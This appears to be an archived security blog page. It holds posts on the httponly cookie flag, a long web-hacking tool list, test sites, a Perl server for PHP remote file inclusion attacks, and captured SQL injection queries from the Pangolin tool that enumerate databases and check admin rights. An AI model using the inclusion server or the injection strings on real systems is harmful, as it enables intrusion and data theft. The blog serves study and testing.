168 posts in 'All categories'

  1. 2010.01.27 Preventing cookie hijacking with the cookie httponly flag
  2. 2010.01.25 Hack & tools
  3. 2010.01.25 test and Demonstration site
  4. 2010.01.25 Hacking Without All the Jailtime
  5. 2010.01.21 Tool used for PHP remote include attacks
  6. 2010.01.07 Pangolin Professional Edition v3.0.0.1011: a quick query analysis
  7. 2010.01.06 Linux file types -
  8. 2009.12.31 tistory start -

Preventing cookie hijacking with the cookie httponly flag

web/method 2010. 1. 27. 00:02

http://blog.naver.com/kim119z?Redirect=Log&logNo=150053838896

About the cookie httponly option

1. When was it introduced?
   -First supported in 2002 by MS IE 6.0 SP1

2. What does it do?
   -When a cookie is created in the client browser with the httponly option set,
    the browser does not answer requests for that cookie from client-side script.
   -For example, if a cookie was set with the httponly option, its contents cannot
    be obtained from the browser through JavaScript's document.cookie property.

3. Why was it created?
   -It was developed to counter cookie hijacking via XSS.

4. Supporting browsers
   -Microsoft Internet Explorer 6.0 SP1 and later
   -Mozilla Firefox 3.0.0.6+ and later
   -Netscape Navigator 9.0b3 and later
   -Opera 9.50 and later
   -Google's Chrome

   -It has nothing to do with the server-side language, such as ASP or JSP.
    The Set-Cookie header that issues the cookie only needs to contain the string httponly;
    the only question is whether the client-side browser supports the option.
   -Most current browsers support it, and if a browser does not, no error occurs;
    the option is simply ignored.

 

5. MS's standardization efforts

   -In ASP.NET 2.0, httponly is set by default on the system cookies.

   -Excerpt from MSDN

    "HttpOnly. This property specifies whether the cookie can be accessed by client script. In ASP.NET 2.0, this value is always set to true. Internet Explorer 6 Service Pack 1 supports this cookie attribute, which prevents client-side script from accessing the cookie from the document.cookie property."
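As an added example (not from the original post), the following Python check illustrates the point made above: the server-side language does not matter, only whether the Set-Cookie value carries the HttpOnly attribute. It parses captured response headers, reports which cookies lack the flag, and builds a header that has it; the sample headers are constructed, and the function names are my own.

```python
# Added example (not from the original post): audit Set-Cookie headers for the
# HttpOnly flag and build a header that carries it. Only the attribute string in
# the header matters, so the check is the same whatever language set the cookie.
from http.cookies import SimpleCookie


def parse_set_cookie(header_value):
    """Split one Set-Cookie header value into (name, value, attributes).

    Attribute keys are lower-cased; flag attributes (HttpOnly, Secure) map to True.
    """
    parts = [p.strip() for p in header_value.split(";")]
    name, _, value = parts[0].partition("=")
    attrs = {}
    for part in parts[1:]:
        if not part:
            continue
        key, _, val = part.partition("=")
        attrs[key.strip().lower()] = val.strip() if val else True
    return name.strip(), value, attrs


def audit_set_cookie(headers):
    """Return {cookie_name: bool} telling whether each Set-Cookie carries HttpOnly.

    `headers` is a list of (header_name, header_value) tuples as captured from a
    response; headers other than Set-Cookie are ignored.
    """
    result = {}
    for hname, hvalue in headers:
        if hname.lower() != "set-cookie":
            continue
        name, _value, attrs = parse_set_cookie(hvalue)
        # The flag name is case-insensitive: HttpOnly, httponly and HTTPONLY all count
        result[name] = "httponly" in attrs
    return result


def build_session_cookie(name, value, http_only=True):
    """Return the Set-Cookie header value for a session cookie.

    SimpleCookie already knows the 'httponly' flag, so no manual string building.
    """
    cookie = SimpleCookie()
    cookie[name] = value
    cookie[name]["path"] = "/"
    if http_only:
        cookie[name]["httponly"] = True
    return cookie[name].OutputString()


# Constructed sample response headers (not captured from any real site)
SAMPLE_HEADERS = [
    ("Content-Type", "text/html"),
    ("Set-Cookie", "ASP.NET_SessionId=abc123; path=/; HttpOnly"),
    ("Set-Cookie", "JSESSIONID=def456; Path=/app"),
    ("Set-Cookie", "prefs=lang%3Dko; Path=/; httponly"),
]

if __name__ == "__main__":
    for cookie_name, ok in audit_set_cookie(SAMPLE_HEADERS).items():
        print(f"{cookie_name}: {'HttpOnly' if ok else 'readable via document.cookie'}")
    print(build_session_cookie("PHPSESSID", "xyz789"))
```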

 

http://msdn.microsoft.com/en-us/library/ms533046.aspx
http://blogs.msdn.com/ie8kr/archive/2009/03/17/ie8-5.aspx

http://www.owasp.org/index.php/HTTPOnly
http://msdn.microsoft.com/en-us/library/aa480476.aspx


Hack & tools

security 2010. 1. 25. 04:11

Phoenix/Tools From OWASP

https://www.owasp.org/index.php/Phoenix/Tools

LiveCDs

AOC_Labrat-ALPHA-0010.iso - http://www.packetfocus.com/hackos/
DVL (Damn Vulnerable Linux) - http://www.damnvulnerablelinux.org/

Test sites / testing grounds

SPI Dynamics (live) - http://zero.webappsecurity.com/
Cenzic (live) - http://crackme.cenzic.com/
Watchfire (live) - http://demo.testfire.net/
Acunetix (live) - http://testphp.acunetix.com/ http://testasp.acunetix.com http://testaspnet.acunetix.com
WebMaven / Buggy Bank (includes live testsite) - http://www.mavensecurity.com/webmaven
Foundstone SASS tools - http://www.foundstone.com/index.htm?subnav=resources/navigation.htm&subcontent=/resources/s3i_tools.htm
OWASP WebGoat - http://www.owasp.org/index.php/OWASP_WebGoat_Project
OWASP SiteGenerator - http://www.owasp.org/index.php/Owasp_SiteGenerator
Stanford SecuriBench - http://suif.stanford.edu/~livshits/securibench/
SecuriBench Micro - http://suif.stanford.edu/~livshits/work/securibench-micro/

HTTP proxying / editing

WebScarab - http://www.owasp.org/index.php/Category:OWASP_WebScarab_Project
Burp - http://www.portswigger.net/
Paros - http://www.parosproxy.org/
Fiddler - http://www.fiddlertool.com/
Web Proxy Editor - http://www.microsoft.com/mspress/companion/0-7356-2187-X/
Pantera - http://www.owasp.org/index.php/Category:OWASP_Pantera_Web_Assessment_Studio_Project
Suru - http://www.sensepost.com/research/suru/
httpedit (curses-based) - http://www.neutralbit.com/en/rd/httpedit/
Charles - http://www.xk72.com/charles/
Odysseus - http://www.bindshell.net/tools/odysseus
Burp, Paros, and WebScarab for Mac OS X - http://www.corsaire.com/downloads/
Web-application scanning tool from `Network Security Tools'/O'Reilly - http://examples.oreilly.com/networkst/
JS Commander - http://jscmd.rubyforge.org/

RSnake's XSS cheat sheet based-tools, webapp fuzzing, and encoding tools

Wfuzz - http://www.edge-security.com/wfuzz.php
ProxMon - http://www.isecpartners.com/proxmon.html
Wapiti - http://wapiti.sourceforge.net/
Grabber - http://rgaucher.info/beta/grabber/
XSSScan - http://darkcode.ath.cx/scanners/XSSscan.py
CAL9000 - http://www.owasp.org/index.php/Category:OWASP_CAL9000_Project
HTMangLe - http://www.fishnetsecurity.com/Tools/HTMangLe/publish.htm
JBroFuzz - http://sourceforge.net/projects/jbrofuzz
XSSFuzz - http://ha.ckers.org/blog/20060921/xssfuzz-released/
WhiteAcid's XSS Assistant - http://www.whiteacid.org/greasemonkey/
Overlong UTF - http://www.microsoft.com/mspress/companion/0-7356-2187-X/
[TGZ] MielieTool (SensePost Research) - http://packetstormsecurity.org/UNIX/utilities/mielietools-v1.0.tgz
RegFuzzer: test your regular expression filter - http://rgaucher.info/b/index.php/post/2007/05/26/RegFuzzer%3A-Test-your-regular-expression-filter
screamingCobra - http://www.dachb0den.com/projects/screamingcobra.html
SPIKE and SPIKE Proxy - http://immunitysec.com/resources-freesoftware.shtml
RFuzz - http://rfuzz.rubyforge.org/
WebFuzz - http://www.codebreakers-journal.com/index.php?option=com_content&task=view&id=112&Itemid=99999999
TestMaker - http://www.pushtotest.com/Docs/downloads/features.html
ASP Auditor - http://michaeldaw.org/projects/asp-auditor-v2/
WSTool - http://wstool.sourceforge.net/
Web Hack Control Center (WHCC) - http://ussysadmin.com/whcc/
Web Text Converter - http://www.microsoft.com/mspress/companion/0-7356-2187-X/
HackBar (Firefox Add-on) - https://addons.mozilla.org/firefox/3899/
Net-Force Tools (NF-Tools, Firefox Add-on) - http://www.net-force.nl/library/downloads/
PostIntercepter (Greasemonkey script) - http://userscripts.org/scripts/show/743

HTTP general testing / fingerprinting

Wbox: HTTP testing tool - http://hping.org/wbox/
ht://Check - http://htcheck.sourceforge.net/
Mumsie - http://www.lurhq.com/tools/mumsie.html
WebInject - http://www.webinject.org/
Torture.pl Home Page - http://stein.cshl.org/~lstein/torture/
JoeDog's Siege - http://www.joedog.org/JoeDog/Siege/
OPEN-LABS: metoscan (http method testing) - http://www.open-labs.org/
Load-balancing detector - http://ge.mine.nu/lbd.html
HMAP - http://ujeni.murkyroc.com/hmap/
Net-Square: httprint - http://net-square.com/httprint/
Wpoison: http stress testing - http://wpoison.sourceforge.net/
Net-square: MSNPawn - http://net-square.com/msnpawn/index.shtml
hcraft: HTTP Vuln Request Crafter - http://druid.caughq.org/projects/hcraft/
rfp.labs: LibWhisker - http://www.wiretrip.net/rfp/lw.asp
Nikto - http://www.cirt.net/code/nikto.shtml
twill - http://twill.idyll.org/
DirBuster - http://www.sittinglittleduck.com/DirBuster/
[ZIP] DFF Scanner - http://security-net.biz/files/dff/DFF.zip
[ZIP] The Elza project - http://packetstormsecurity.org/web/elza-1.4.7-beta.zip http://www.stoev.org/elza.html

Browser-based HTTP tampering / editing / replaying

TamperIE - http://www.bayden.com/Other/
isr-form - http://www.infobyte.com.ar/developments.html
Modify Headers (Firefox Add-on) - http://modifyheaders.mozdev.org/
Tamper Data (Firefox Add-on) - http://tamperdata.mozdev.org/
UrlParams (Firefox Add-on) - https://addons.mozilla.org/en-US/firefox/addon/1290/
TestGen4Web (Firefox Add-on) - https://addons.mozilla.org/en-US/firefox/addon/1385/
DOM Inspector / Inspect This (Firefox Add-on) - https://addons.mozilla.org/en-US/firefox/addon/1806/ https://addons.mozilla.org/en-US/firefox/addon/1913/
LiveHTTPHeaders / Header Monitor (Firefox Add-on) - http://livehttpheaders.mozdev.org/ https://addons.mozilla.org/en-US/firefox/addon/575/

Cookie editing / poisoning

[TGZ] stompy: session id tool - http://lcamtuf.coredump.cx/stompy.tgz
Add'N Edit Cookies (AnEC, Firefox Add-on) - http://addneditcookies.mozdev.org/
CookieCuller (Firefox Add-on) - http://cookieculler.mozdev.org/
CookiePie (Firefox Add-on) - http://www.nektra.com/oss/firefox/extensions/cookiepie/
CookieSpy - http://www.codeproject.com/shell/cookiespy.asp
Cookies Explorer - http://www.dutchduck.com/Features/Cookies.aspx

Ajax and XHR scanning

Sahi - http://sahi.co.in/
scRUBYt - http://scrubyt.org/
jQuery - http://jquery.com/
jquery-include - http://www.gnucitizen.org/projects/jquery-include
Sprajax - http://www.denimgroup.com/sprajax.html
Watir - http://wtr.rubyforge.org/
Watij - http://watij.com/
Watin - http://watin.sourceforge.net/
RBNarcissus - http://idontsmoke.co.uk/2005/rbnarcissus/
SpiderTest (Spider Fuzz plugin) - http://blog.caboo.se/articles/2007/2/21/the-fabulous-spider-fuzz-plugin
Javascript Inline Debugger (jasildbg) - http://jasildbg.googlepages.com/
Firebug Lite - http://www.getfirebug.com/lite.html
firewatir - http://code.google.com/p/firewatir/

RSS extensions and caching

LiveLines (Firefox Add-on) - https://addons.mozilla.org/en-US/firefox/addon/324/
rss-cache - http://www.dubfire.net/chris/projects/rss-cache/

SQL injection scanning

0x90.org: home of Absinthe, Mezcal, etc - http://0x90.org/releases.php
SQLiX - http://www.owasp.org/index.php/Category:OWASP_SQLiX_Project
sqlninja: a SQL Server injection and takeover tool - http://sqlninja.sourceforge.net/
JustinClarke's SQL Brute - http://www.justinclarke.com/archives/2006/03/sqlbrute.html
BobCat - http://www.northern-monkee.co.uk/projects/bobcat/bobcat.html
sqlmap - http://sqlmap.sourceforge.net/
Scully: SQL Server DB Front-End and Brute-Forcer - http://www.sensepost.com/research/scully/
FG-Injector - http://www.flowgate.net/?lang=en&seccion=herramientas
PRIAMOS - http://www.priamos-project.com/

Web application security malware, backdoors, and evil code

W3AF: Web Application Attack and Audit Framework - http://w3af.sourceforge.net/
Jikto - http://busin3ss.name/jikto-in-the-wild/
XSS Shell - http://ferruh.mavituna.com/article/?1338
XSS-Proxy - http://xss-proxy.sourceforge.net
AttackAPI - http://www.gnucitizen.org/projects/attackapi/
FFsniFF - http://azurit.elbiahosting.sk/ffsniff/
HoneyBlog's web-based junkyard - http://honeyblog.org/junkyard/web-based/
BeEF - http://www.bindshell.net/tools/beef/
Firefox Extension Scanner (FEX) - http://www.gnucitizen.org/projects/fex/
What is my IP address? - http://reglos.de/myaddress/
xRumer: blogspam automation tool - http://www.botmaster.net/movies/XFull.htm
SpyJax - http://www.merchantos.com/makebeta/tools/spyjax/
Greasecarnaval - http://www.gnucitizen.org/projects/greasecarnaval
Technika - http://www.gnucitizen.org/projects/technika/
Load-AttackAPI bookmarklet - http://www.gnucitizen.org/projects/load-attackapi-bookmarklet
MD's Projects: JS port scanner, pinger, backdoors, etc - http://michaeldaw.org/my-projects/

Web application services that aid in web application security assessment

Netcraft - http://www.netcraft.net
AboutURL - http://www.abouturl.com/
The Scrutinizer - http://www.scrutinizethis.com/
net.toolkit - http://clez.net/
ServerSniff - http://www.serversniff.net/
Online Microsoft script decoder - http://www.greymagic.com/security/tools/decoder/
Webmaster-Toolkit - http://www.webmaster-toolkit.com/
myIPNeighbors, et al - http://digg.com/security/MyIPNeighbors_Find_Out_Who_Else_is_Hosted_on_Your_Site_s_IP_Address
PHP charset encoding - http://h4k.in/encoding
data: URL testcases - http://h4k.in/dataurl

Browser-based security fuzzing / checking

Zalewski's MangleMe - http://lcamtuf.coredump.cx/mangleme/mangle.cgi
hdm's tools: Hamachi, CSSDIE, DOM-Hanoi, AxMan - http://metasploit.com/users/hdm/tools/
Peach Fuzzer Framework - http://peachfuzz.sourceforge.net/
TagBruteForcer - http://research.eeye.com/html/tools/RT20060801-3.html
PROTOS Test-Suite: c05-http-reply - http://www.ee.oulu.fi/research/ouspg/protos/testing/c05/http-reply/index.html
COMRaider - http://labs.idefense.com
bcheck - http://bcheck.scanit.be/bcheck/
Stop-Phishing: Projects page - http://www.indiana.edu/~phishing/?projects
LinkScanner - http://linkscanner.explabs.com/linkscanner/default.asp
BrowserCheck - http://www.heise-security.co.uk/services/browsercheck/
Cross-browser Exploit Tests - http://www.jungsonnstudios.com/cool.php
Stealing information using DNS pinning demo - http://www.jumperz.net/index.php?i=2&a=1&b=7
Javascript Website Login Checker - http://ha.ckers.org/weird/javascript-website-login-checker.html
Mozilla Activex - http://www.iol.ie/~locka/mozilla/mozilla.htm
Jungsonn's Black Dragon Project - http://blackdragon.jungsonnstudios.com/
Mr. T (Master Recon Tool, includes Read Firefox Settings PoC) - http://ha.ckers.org/mr-t/
Vulnerable Adobe Plugin Detection For UXSS PoC - http://www.0x000000.com/?i=324
About Flash: is your flash up-to-date? - http://www.macromedia.com/software/flash/about/
Test your installation of Java software - http://java.com/en/download/installed.jsp?detect=jre&try=1

PHP static analysis and file inclusion scanning

PHP-SAT.org: Static analysis for PHP - http://www.program-transformation.org/PHP/
Unl0ck Research Team: tool for searching in google for include bugs - http://unl0ck.net/tools.php
FIS: File Inclusion Scanner - http://www.segfault.gr/index.php?cat_id=3&cont_id=25
PHPSecAudit - http://developer.spikesource.com/projects/phpsecaudit

Web Application Firewall (WAF) and Intrusion Detection (APIDS) rules and resources

APIDS on Wikipedia - http://en.wikipedia.org/wiki/APIDS
PHP Intrusion Detection System (PHP-IDS) - http://php-ids.org/ http://code.google.com/p/phpids/
dotnetids - http://code.google.com/p/dotnetids/
Secure Science InterScout - http://www.securescience.com/home/newsandevents/news/interscout1.0.html
Remo: whitelist rule editor for mod_security - http://remo.netnea.com/
GotRoot: ModSecurity rules - http://www.gotroot.com/tiki-index.php?page=mod_security+rules
The Web Security Gateway (WSGW) - http://wsgw.sourceforge.net/
mod_security rules generator - http://noeljackson.com/tools/modsecurity/
Mod_Anti_Tamper - http://www.wisec.it/projects.php?id=3
[TGZ] Automatic Rules Generation for Mod_Security - http://www.wisec.it/rdr.php?fn=/Projects/Rule-o-matic.tgz
AQTRONIX WebKnight - http://www.aqtronix.com/?PageID=99
Akismet: blog spam defense - http://akismet.com/
Samoa: Formal tools for securing web services - http://research.microsoft.com/projects/samoa/

Web services enumeration / scanning / fuzzing

WebServiceStudio2.0 - http://www.gotdotnet.com/Community/UserSamples/Details.aspx?SampleGuid=65a1d4ea-0f7a-41bd-8494-e916ebc4159c
Net-square: wsChess - http://net-square.com/wschess/index.shtml
WSFuzzer - http://www.owasp.org/index.php/Category:OWASP_WSFuzzer_Project
SIFT: web method search tool - http://www.sift.com.au/73/171/sift-web-method-search-tool.htm
iSecPartners: WSMap, WSBang, etc - http://www.isecpartners.com/tools.html

Web application non-specific static source-code analysis

Pixy: a static analysis tool for detecting XSS vulnerabilities - http://www.seclab.tuwien.ac.at/projects/pixy/
Brixoft.Net: Source Edit - http://www.brixoft.net/prodinfo.asp?id=1
Security compass web application auditing tools (SWAAT) - http://www.owasp.org/index.php/Category:OWASP_SWAAT_Project
An even more complete list here - http://www.cs.cmu.edu/~aldrich/courses/654/tools/
A nice list that claims some demos available - http://www.cs.cmu.edu/~aldrich/courses/413/tools.html
A smaller, but also good list - http://spinroot.com/static/

Static analysis for C/C++ (CGI, ISAPI, etc) in web applications

RATS - http://www.securesoftware.com/resources/download_rats.html
ITS4 - http://www.cigital.com/its4/
FlawFinder - http://www.dwheeler.com/flawfinder/
Splint - http://www.splint.org/
Uno - http://spinroot.com/uno/
BOON (Buffer Overrun detectiON) - http://www.cs.berkeley.edu/~daw/boon/ http://boon.sourceforge.net
Valgrind - http://www.valgrind.org/

Java static analysis, security frameworks, and web application security tools

HDIV Struts - http://hdiv.org/
Orizon - http://sourceforge.net/projects/orizon/
FindBugs: Find bugs in Java programs - http://findbugs.sourceforge.net/
PMD - http://pmd.sourceforge.net/
CUTE: A Concolic Unit Testing Engine for C and Java - http://osl.cs.uiuc.edu/~ksen/cute/
EMMA - http://emma.sourceforge.net/
JLint - http://jlint.sourceforge.net/
Java PathFinder - http://javapathfinder.sourceforge.net/
Fujaba: Move between UML and Java source code - http://wwwcs.uni-paderborn.de/cs/fujaba/
Checkstyle - http://checkstyle.sourceforge.net/
Cookie Revolver Security Framework - http://sourceforge.net/projects/cookie-revolver
tinapoc - http://sourceforge.net/projects/tinapoc
jarsigner - http://java.sun.com/j2se/1.5.0/docs/tooldocs/solaris/jarsigner.html
Solex - http://solex.sourceforge.net/
Java Explorer - http://metal.hurlant.com/jexplore/
HTTPClient - http://www.innovation.ch/java/HTTPClient/
another HttpClient - http://jakarta.apache.org/commons/httpclient/
a list of code coverage and analysis tools for Java - http://mythinkpond.blogspot.com/2007/06/java-foss-freeopen-source-software.html

Microsoft .NET static analysis and security framework tools, mostly for ASP.NET and ASP.NET AJAX, but also C# and VB.NET

Orcas - http://msdn.microsoft.com/vstudio/express/future/downloads/default.aspx
Web Development Helper - http://www.nikhilk.net/Project.WebDevHelper.aspx
FxCop - http://blogs.msdn.com/fxcop/ http://www.gotdotnet.com/team/fxcop/
Microsoft Application Verifier - http://www.microsoft.com/technet/prodtechnol/windows/appcompatibility/appverifier.mspx
Microsoft internal tools you can't have yet - http://www.microsoft.com/windows/cse/pa_projects.mspx http://research.microsoft.com/Pex/ http://www.owasp.org/images/5/5b/OWASP_IL_7_FuzzGuru.pdf

Threat modeling

Microsoft Threat Analysis and Modeling Tool v2.1 (TAM) - http://www.microsoft.com/downloads/details.aspx?FamilyID=59888078-9daf-4e96-b7d1-944703479451&displaylang=en
Amenaza: Attack Tree Modeling (SecurITree) - http://www.amenaza.com/software.php
Octotrike - http://www.octotrike.org/

Add-ons for Firefox that help with general web application security

Web Developer Toolbar - https://addons.mozilla.org/firefox/60/
Plain Old Webserver (POW) - https://addons.mozilla.org/firefox/3002/
XML Developer Toolbar - https://addons.mozilla.org/firefox/2897/
Public Fox - https://addons.mozilla.org/firefox/3911/
XForms Buddy - http://beaufour.dk/index.php?sec=misc&pagename=xforms
MR Tech Local Install - http://www.mrtech.com/extensions/local_install/
Nightly Tester Tools - http://users.blueprintit.co.uk/~dave/web/firefox/buildid/index.html
IE Tab - https://addons.mozilla.org/firefox/1419/
User-Agent Switcher - https://addons.mozilla.org/firefox/59/
ServerSwitcher - https://addons.mozilla.org/firefox/2409/
HeaderMonitor - https://addons.mozilla.org/firefox/575/
RefControl - https://addons.mozilla.org/firefox/953/
refspoof - https://addons.mozilla.org/firefox/667/
No-Referrer - https://addons.mozilla.org/firefox/1999/
LocationBar^2 - https://addons.mozilla.org/firefox/4014/
SpiderZilla - http://spiderzilla.mozdev.org/
Slogger - https://addons.mozilla.org/en-US/firefox/addon/143
Fire Encrypter - https://addons.mozilla.org/firefox/3208/

Add-ons for Firefox that help with Javascript and Ajax web application security

Selenium IDE - http://www.openqa.org/selenium-ide/
Firebug - http://www.joehewitt.com/software/firebug/
Venkman - http://www.mozilla.org/projects/venkman/
Chickenfoot - http://groups.csail.mit.edu/uid/chickenfoot/
Greasemonkey - http://www.greasespot.net/
Greasemonkey compiler - http://www.letitblog.com/greasemonkey-compiler/
User script compiler - http://arantius.com/misc/greasemonkey/script-compiler
Extension Developer's Extension (Firefox Add-on) - http://ted.mielczarek.org/code/mozilla/extensiondev/
Smart Middle Click (Firefox Add-on) - https://addons.mozilla.org/en-US/firefox/addon/3885/

Bookmarklets that aid in web application security

RSnake's security bookmarklets - http://ha.ckers.org/bookmarklets.html
BMlets - http://optools.awardspace.com/bmlet.html
Huge list of bookmarklets - http://www.squarefree.com/bookmarklets/
Blummy: consists of small widgets, called blummlets, which make use of Javascript to provide rich functionality - http://www.blummy.com/
Bookmarklets every blogger should have - http://www.micropersuasion.com/2005/10/bookmarklets_ev.html
Flat Bookmark Editing (Firefox Add-on) - http://n01se.net/chouser/proj/mozhack/
OpenBook and Update Bookmark (Firefox Add-ons) - http://www.chuonthis.com/extensions/

SSL certificate checking / scanning

[ZIP] THCSSLCheck - http://thc.org/root/tools/THCSSLCheck.zip
[ZIP] Foundstone SSLDigger - http://www.foundstone.com/us/resources/termsofuse.asp?file=ssldigger.zip
Cert Viewer Plus (Firefox Add-on) - https://addons.mozilla.org/firefox/1964/

Honeyclients, Web Application, and Web Proxy honeypots

Honeyclient Project: an open-source honeyclient - http://www.honeyclient.org/trac/
HoneyC: the low-interaction honeyclient - http://honeyc.sourceforge.net/
Capture: a high-interaction honeyclient - http://capture-hpc.sourceforge.net/
Google Hack Honeypot - http://ghh.sourceforge.net/
PHP.Hop - PHP Honeynet Project - http://www.rstack.org/phphop/
SpyBye - http://www.monkey.org/~provos/spybye/
Honeytokens - http://www.securityfocus.com/infocus/1713

Blackhat SEO and maybe some whitehat SEO

SearchStatus (Firefox Add-on) - http://www.quirk.biz/searchstatus/
SEO for Firefox (Firefox Add-on) - http://tools.seobook.com/firefox/seo-for-firefox.html
SEOQuake (Firefox Add-on) - http://www.seoquake.com/

Footprinting for web application security

Evolution - http://www.paterva.com/evolution-e.html
GooSweep - http://www.mcgrewsecurity.com/projects/goosweep/
Aura: Google API Utility Tools - http://www.sensepost.com/research/aura/
Edge-Security tools - http://www.edge-security.com/soft.php
Fierce Domain Scanner - http://ha.ckers.org/fierce/
Googlegath - http://www.nothink.org/perl/googlegath/
Advanced Dork (Firefox Add-on) - https://addons.mozilla.org/firefox/2144/
Passive Cache (Firefox Add-on) - https://addons.mozilla.org/firefox/977/
CacheOut! (Firefox Add-on) - https://addons.mozilla.org/en-US/firefox/addon/1453/
BugMeNot Extension (Firefox Add-on) - http://roachfiend.com/archives/2005/02/07/bugmenot/
TrashMail.net Extension (Firefox Add-on) - https://addons.mozilla.org/en-US/firefox/addon/1813/
DiggiDig (Firefox Add-on) - https://addons.mozilla.org/en-US/firefox/addon/2819/
Digger (Firefox Add-on) - https://addons.mozilla.org/en-US/firefox/addon/1467/

Database security assessment

Scuba by Imperva Database Vulnerability Scanner - http://www.imperva.com/scuba/

Browser Defenses

DieHard - http://www.diehard-software.org/
LocalRodeo (Firefox Add-on) - http://databasement.net/labs/localrodeo/
NoMoXSS - http://www.seclab.tuwien.ac.at/projects/jstaint/
Request Rodeo - http://savannah.nongnu.org/projects/requestrodeo
FlashBlock (Firefox Add-on) - http://flashblock.mozdev.org/
CookieSafe (Firefox Add-on) - https://addons.mozilla.org/en-US/firefox/addon/2497
NoScript (Firefox Add-on) - http://www.noscript.net/
FormFox (Firefox Add-on) - https://addons.mozilla.org/en-US/firefox/addon/1579/
Adblock (Firefox Add-on) - http://adblock.mozdev.org/
httpOnly in Firefox (Firefox Add-on) - http://blog.php-security.org/archives/40-httpOnly-Cookies-in-Firefox-2.0.html
SafeCache (Firefox Add-on) - http://www.safecache.com/
SafeHistory (Firefox Add-on) - http://www.safehistory.com/
PrefBar (Firefox Add-on) - http://prefbar.mozdev.org/
All-in-One Sidebar (Firefox Add-on) - https://addons.mozilla.org/en-US/firefox/addon/1027/
QArchive.org web file checker (Firefox Add-on) - https://addons.mozilla.org/firefox/4115/
Update Notified (Firefox Add-on) - https://addons.mozilla.org/en-US/firefox/addon/2098/
FireKeeper - http://firekeeper.mozdev.org/

Browser Privacy

TrackMeNot (Firefox Add-on) - https://addons.mozilla.org/firefox/3173/
Privacy Bird - http://www.privacybird.com/

Application and protocol fuzzing (random instead of targeted)

Sulley - http://fuzzing.org/
taof: The Art of Fuzzing - http://sourceforge.net/projects/taof/
zzuf: multipurpose fuzzer - http://sam.zoy.org/zzuf/
autodafé: an act of software torture - http://autodafe.sourceforge.net/
EFS and GPF: Evolutionary Fuzzing System - http://www.appliedsec.com/resources.html

Other posts in the 'security' category

war Game site -  (0) 2010.04.28
Description of each port number  (1) 2010.03.25
port  (0) 2010.01.27
test and Demonstration site  (0) 2010.01.25
Hacking Without All the Jailtime  (0) 2010.01.25

test and Demonstration site

security 2010. 1. 25. 04:10

http://demo.testfire.net/feedback.aspx
http://test.acunetix.com/categories.php


Hacking Without All the Jailtime

security 2010. 1. 25. 04:00

http://ha.ckers.org/blog/20090406/hacking-without-all-the-jailtime/

Hacking Without All the Jailtime

There’s been more and more legislation put in place to try to discourage hacking in general, and even tool development. Not that I think it’ll lead to many prosecutions anywhere, but nevertheless, it’s always nice to have a place to test. I got an email from one of my readers asking about the hackme series:

Hello and thank you for an awesome blog, and a daily read.

A while back you mentioned some “ready-made” websites that were used in the web app sec sphere to test scanners and specific tools. More specifically you mentioned 2, one of which was somewhat deprecated, but still had some educational value. I’ve been looking through your posts, but I have had no success finding this entry.

I’ll do one better - here’s a short list I compiled that includes a lot of the more popular tools for ethical testing, without all the muss and fuss of prison time. If you want to hone your skills or just have some fun at work, try these out (in no particular order):

If there are others that should be added to this list, please drop me a line and I’ll add them. I hope everyone had a good April 1st and that insurance covers whatever was damaged. 


Tool used for PHP remote include attacks

web/include 2010. 1. 21. 02:28

Tool used for PHP remote include attacks

A tool for carrying out a PHP remote include attack simply, without having to bring up a separate web server.
I'm posting it because netcat on Fedora behaves differently from the original netcat (probably GNU netcat).
 

#!/usr/bin/perl
# Minimal forking HTTP server: answers every request with the contents of $open_file
use strict;
use warnings;
use IO::Socket;

my $open_file = "./info.php";   # file served as the response body

sub Wait {
  wait;           # reap finished children so <defunct> pids don't build up
}

$SIG{CHLD} = \&Wait;

my $server = IO::Socket::INET->new(LocalPort => 8080,
                                   Type      => SOCK_STREAM,
                                   Reuse     => 1,
                                   Listen    => 10) or die "$@\n";
my $client;

while ( $client = $server->accept()) {
  next if my $pid = fork;            # parent: back to accept()
  die "fork - $!\n" unless defined $pid;

  # child: serve this one request
  select $client;
  $| = 1;                            # unbuffered output to the client
  print $client "HTTP/1.0 200 OK\r\n";
  print $client "Content-type: text/html\r\n\r\n";

  #  print $client '<?php phpinfo(); ?>';
  open(my $fh, "<", $open_file) or die "open $open_file - $!\n";
  while (my $line = <$fh>) {
    print $client $line;
  }
  close($fh);

  close($client);
  exit;
} continue {
  close($client);               # parent closes its copy of the socket; kills hangs
  kill CHLD => -$$;
}


It acts as a web server by itself; by editing the source you can change the port and the command that gets executed.

Alternatively, if socat is available, you can do it as shown below.
Save the following shell script as php_inc_ex.sh, run chmod 755 php_inc_ex.sh, then start it as shown in the comment.

#!/bin/sh
# socat TCP4-LISTEN:8080,fork EXEC:./php_inc_ex.sh

echo "HTTP/1.0 200 OK";
echo "Content-type: text/html";
echo "";
echo '<?php phpinfo(); ?>';

 

Note: with the shell script, printing directly or via a here document works fine, but reading another file and printing its contents produces a lot of broken pipe errors.


Pangolin Professional Edition v3.0.0.1011: a quick query analysis

web/injection 2010. 1. 7. 02:33
http://malwarelab.tistory.com/64


It is not malware, but I analysed Pangolin, a well-known SQL injection tool,
to see what queries it sends to perform the injection.

With the previous version I mostly left the options at their defaults;
this time I changed the options one by one and checked which queries it sends.

The first thing to look at is Setting -> Advanced.

Replace space as /**/ , + , %09 , [TAB]
Bypass firewall filter when 'select' is not allow
Auto-analyzing keyword
URI Encode Mode
Enable BT Model (bypass firewall)
Stop after error happens(access data)
Auto check record count of tables

There were seven options in total, four of which are for replacing the space character.
The default option is Auto-analyzing keyword.

I selected each option in turn and captured the packets. For the test I only clicked the run button to let it pick the basic targets to collect, then clicked Select All and Go to collect just the basic information.

First let's check which queries it sends, then look at how the options differ.


0x01 Pangolin SQL Injection Query

 and db_name()>0--
 and @@version>1--
 and db_name()>0--
 and @@servername>0--
 and host_name()=0--
 and system_user>0--
 and user>0--
 and cast(is_srvrolemember(0x730079007300610064006d0069006e00) as nvarchar(1))+char(124)=1 and 1=1
 and (select top 1 cast([name] as nvarchar(500))+char(94) from [master].[dbo].[sysdatabases] where [dbid] in (select top 1 [dbid] from [master].[dbo].[sysdatabases] order by [dbid] desc))>0--
 and (select top 1 cast([name] as nvarchar(500))+char(94) from [master].[dbo].[sysdatabases] where [dbid] in (select top 2 [dbid] from [master].[dbo].[sysdatabases] order by [dbid] desc))>0--
 and (select top 1 cast([name] as nvarchar(500))+char(94) from [master].[dbo].[sysdatabases] where [dbid] in (select top 3 [dbid] from [master].[dbo].[sysdatabases] order by [dbid] desc))>0--
